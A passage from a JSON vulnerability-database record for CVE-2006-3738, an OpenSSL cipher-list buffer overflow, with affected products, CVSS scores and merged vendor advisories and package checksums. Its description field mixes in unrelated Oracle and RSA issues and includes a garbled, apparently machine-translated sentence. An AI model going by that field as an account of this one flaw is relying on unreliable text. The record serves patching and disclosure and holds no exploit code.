            "version": "9000"
          },
          {
            "_id": null,
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.3.2"
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "s8700 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "computing snapgear sg580",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100"
          },
          {
            "_id": null,
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "ons 15454e optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1-1"
          },
          {
            "_id": null,
            "model": "application control engine module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44920"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "project openssl l",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "_id": null,
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.2"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "_id": null,
            "model": "ons mstp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "_id": null,
            "model": "networks wlan access point",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7250.0"
          },
          {
            "_id": null,
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(2)"
          },
          {
            "_id": null,
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.48"
          },
          {
            "_id": null,
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.47"
          },
          {
            "_id": null,
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.22"
          },
          {
            "_id": null,
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "_id": null,
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6"
          },
          {
            "_id": null,
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
            "_id": null,
            "model": "oracle9i standard edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "_id": null,
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "_id": null,
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "_id": null,
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "_id": null,
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6"
          },
          {
            "_id": null,
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
            "_id": null,
            "model": "oracle9i personal edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "_id": null,
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "_id": null,
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "_id": null,
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8.0"
          },
          {
            "_id": null,
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7.0"
          },
          {
            "_id": null,
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6.0"
          },
          {
            "_id": null,
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
            "_id": null,
            "model": "oracle9i enterprise edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "_id": null,
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "_id": null,
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "_id": null,
            "model": "oracle8i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7.4"
          },
          {
            "_id": null,
            "model": "oracle8i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7.4.0"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4.2"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.5"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
            "_id": null,
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "_id": null,
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "_id": null,
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "_id": null,
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "_id": null,
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
            "_id": null,
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "_id": null,
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "_id": null,
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "_id": null,
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "_id": null,
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
            "_id": null,
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3.4.0"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3.0.0"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.2.0"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.1.0"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.2"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.1"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.2"
          },
          {
            "_id": null,
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.1"
          },
          {
            "_id": null,
            "model": "identity management 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4.0.1"
          },
          {
            "_id": null,
            "model": "9i application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.0.2.2"
          },
          {
            "_id": null,
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.5"
          },
          {
            "_id": null,
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4"
          },
          {
            "_id": null,
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3"
          },
          {
            "_id": null,
            "model": "e-business suite 11i cu2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.10"
          },
          {
            "_id": null,
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.10"
          },
          {
            "_id": null,
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.9"
          },
          {
            "_id": null,
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.8"
          },
          {
            "_id": null,
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.7"
          },
          {
            "_id": null,
            "model": "e-business suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "developer suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.2"
          },
          {
            "_id": null,
            "model": "developer suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.3"
          },
          {
            "_id": null,
            "model": "developer suite 6i",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.2"
          },
          {
            "_id": null,
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.1"
          },
          {
            "_id": null,
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.0"
          },
          {
            "_id": null,
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "29.0.2.3"
          },
          {
            "_id": null,
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.3"
          },
          {
            "_id": null,
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.2"
          },
          {
            "_id": null,
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.1"
          },
          {
            "_id": null,
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4"
          },
          {
            "_id": null,
            "model": "oracle for openview for linux ltu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "0"
          },
          {
            "_id": null,
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.1.7"
          },
          {
            "_id": null,
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:openssl:openssl",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:oracle:e-business_suite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:oracle:http_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_appliance_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_desktop",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_fuji",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_multimedia",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_personal",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_wizpy",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_home",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:trendmicro:interscan_web_security_suite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hp:hp-ux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:linux_advanced_workstation",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "The vendor credits Tavis Ormandy and Will Drewry of the Google Security Team with the discovery of this vulnerability.",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2006-3738",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2006-3738",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2006-3738",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#386964",
                "trust": 0.8,
                "value": "0.32"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#221788",
                "trust": 0.8,
                "value": "4.20"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#845620",
                "trust": 0.8,
                "value": "7.56"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#547300",
                "trust": 0.8,
                "value": "2.53"
              },
              {
                "author": "NVD",
                "id": "CVE-2006-3738",
                "trust": 0.8,
                "value": "High"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. The Oracle SYS.DBMS_AQ package is vulnerable to PL/SQL injection. This vulnerability may allow a remote, authenticated attacker to execute arbitrary PL/SQL commands on a vulnerable Oracle installation. OpenSSL Library utility functions 1 First, output a list of encryption algorithms used for communication as a readable character string. SSL_get_shared_ciphers() there is. SSL_get_shared_ciphers() There is a buffer overflow vulnerability in the processing of.OpenSSL Any code may be executed with the privileges of the application that uses it. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. \nSuccessfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. Oracle has released a Critical Patch Update advisory for January 2007 to address these vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well. \nThe issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. OpenSSL Security Advisory [28th September 2006]\n\nNew OpenSSL releases are now available to correct four security\nissues. \n\n\nASN.1 Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940)\n==============================================================\n\nVulnerability\n-------------\n\nDr. Henson recently developed an ASN.1 test suite for NISCC\n(www.niscc.gov.uk). During the parsing of certain invalid ASN.1 structures an error\ncondition is mishandled.  This can result in an infinite loop which\nconsumes system memory (CVE-2006-2937).  (This issue did not affect\nOpenSSL versions prior to 0.9.7)\n\n2. Certain types of public key can take disproportionate amounts of\ntime to process. This could be used by an attacker in a denial of\nservice attack (CVE-2006-2940). \n\nAny code which uses OpenSSL to parse ASN.1 data from untrusted sources\nis affected. This includes SSL servers which enable client\nauthentication and S/MIME applications. \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Dr S. Henson of Open Network Security and NISCC\nfor funding the ASN.1 test suite project. \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Tavis Ormandy and Will Drewry of the Google\nSecurity Team for reporting this issue. \n\n\nSSLv2 Client Crash (CVE-2006-4343)\n==================================\n\nVulnerability\n-------------\n\nA flaw in the SSLv2 client code was discovered. \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Tavis Ormandy and Will Drewry of the Google\nSecurity Team for reporting this issue. \n\n\nRecommendations\n===============\n\nThese vulnerabilities are resolved in the following versions of OpenSSL:\n\n   - in the 0.9.7 branch, version 0.9.7l (or later);\n   - in the 0.9.8 branch, version 0.9.8d (or later). \n\nOpenSSL 0.9.8d and OpenSSL 0.9.7l are available for download via\nHTTP and FTP from the following master locations (you can find the\nvarious FTP mirrors under https://www.openssl.org/source/mirror.html):\n\n    o https://www.openssl.org/source/\n    o ftp://ftp.openssl.org/source/\n\nThe distribution file names are:\n\n    o openssl-0.9.8d.tar.gz\n      MD5 checksum: 8ed1853538e1d05a1f5ada61ebf8bffa\n      SHA1 checksum: 4136fba00303a3d319d2052bfa8e1f09a2e12fc2\n\n    o openssl-0.9.7l.tar.gz\n      MD5 checksum: b21d6e10817ddeccf5fbe1379987333e\n      SHA1 checksum: f0e4136639b10cbd1227c4f7350ff7ad406e575d\n    \nThe checksums were calculated using the following commands:\n\n    openssl md5 openssl-0.9*.tar.gz\n    openssl sha1 openssl-0.9*.tar.gz\n\nAfter upgrading make sure to recompile any applications statically\nlinked to OpenSSL libraries and restart all applications that use\nOpenSSL. rPath Security Advisory: 2006-0175-2\nPublished: 2006-09-28\nUpdated:\n    2006-09-29 Resolved issue in patch for CVE-2006-2940\nProducts: rPath Linux 1\nRating: Major\nExposure Level Classification:\n    Remote Deterministic Unauthorized Access\nUpdated Versions:\n    openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1\n    openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1\n\nReferences:\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n    http://issues.rpath.com/browse/RPL-613\n\nDescription:\n    Previous versions of the openssl package are vulnerable to multiple\n    attacks. \n    In particular, any connection that the mysql daemon will accept\n    may be vulnerable.  In the default configuration of mysql, that\n    would be a local unauthorized access vulnerability, but mysql can\n    be configured to listen for network connections from remote hosts,\n    which would then enable remote unauthorized access.  Any program\n    that calls the SSL_get_shared_ciphers() function may be vulnerable. \n    \n    29 September 2006 Update: The initial fix for this vulnerability was\n    incomplete, and the fault in the fix could enable a Denial of Service\n    attack in some cases of the attack described in CVE-2006-2940. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \n\n Update:\n\n There was an error in the original published patches for CVE-2006-2940. \n New packages have corrected this issue. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2006.0:\n 5e48a8d9a6a03a045b6d0d2b6903dc5b  2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm\n f86f3a2efd19ff5fb1600212cbd8e463  2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 73b99c1a8a34fe3c2279c09c4f385804  2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 526fcd69e1a1768c82afd573dc16982f  2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm \n 441a806fc8a50f74f5b4bcfce1fc8f66  2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm\n\n Mandriva Linux 2006.0/X86_64:\n 54ed69fc4976d3c0953eeebd3c10471a  2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm\n 632fbe5eaff684ec2f27da4bbe93c4f6  2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm\n 04dbe52bda3051101db73fabe687bd7e  2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm\n 5e48a8d9a6a03a045b6d0d2b6903dc5b  2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm\n f86f3a2efd19ff5fb1600212cbd8e463  2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 73b99c1a8a34fe3c2279c09c4f385804  2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm\n ca169246cc85db55839b265b90e8c842  2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm \n 441a806fc8a50f74f5b4bcfce1fc8f66  